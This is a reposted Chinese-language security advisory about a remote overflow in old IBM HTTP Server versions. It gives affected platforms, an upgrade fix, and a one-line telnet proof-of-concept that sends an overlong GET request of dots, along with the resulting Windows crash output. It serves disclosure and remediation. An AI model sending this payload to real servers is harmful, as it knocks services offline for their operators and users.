詳細: IBM 的 HTTP 服務器是一個 web 服務器。在 Windows NT 使用的版本中存在拒絕服務的漏洞。
如果提交一個超過219個字符的 GET 請求,將導致服務器停止響應,并報錯。要恢復服務正常工作需要重新啟動應用程序。成功的利用該漏洞,攻擊者可在受害的主機上執(zhí)行任何代碼。(但這還未得到完全證實。)
以下代碼僅僅用來測試和研究這個漏洞,如果您將其用于不正當?shù)耐緩秸埡蠊载?br>
$ telnet target 80 GET /......(216個".")aaa HTTP/1.0
則系統(tǒng)會報告下列錯誤信息: ***STOP:0x0000001e(0X00000005,0X804B3A51,0X00000000,0X00000000)KMODE_EXCEPTI ON_NOT_HANDLED. ***Address 804B3A51 base at 80400000,Datastamp 384D9B17-ntoskrnl.exe 注意:目標主機運行在Windows 2000下。
受影響的系統(tǒng) IBM HTTP Server 1.3.6.3 - TurboLinux Turbo Linux 3.0.1 - Sun Solaris 2.6 - S.u.S.E. Linux 6.1 - S.u.S.E. Linux 6.0 - RedHat Linux 6.0 sparc - RedHat Linux 5.2 sparc - Microsoft Windows NT 4.0 - IBM AIX 4.2.1 - Caldera OpenLinux 2.2
解決方案: IBM 已經(jīng)在 1.3.12 版本中解決了此問題,下載地址: http://www-4.ibm.com/software/webservers/httpservers/download.html
巨人網(wǎng)絡通訊聲明:本文標題《IBM HTTP Server 遠程溢出漏洞》,本文關鍵詞 IBM,HTTP,Server,遠程,溢出,;如發(fā)現(xiàn)本文內容存在版權問題,煩請?zhí)峁┫嚓P信息告之我們,我們將及時溝通與處理。本站內容系統(tǒng)采集于網(wǎng)絡,涉及言論、版權與本站無關。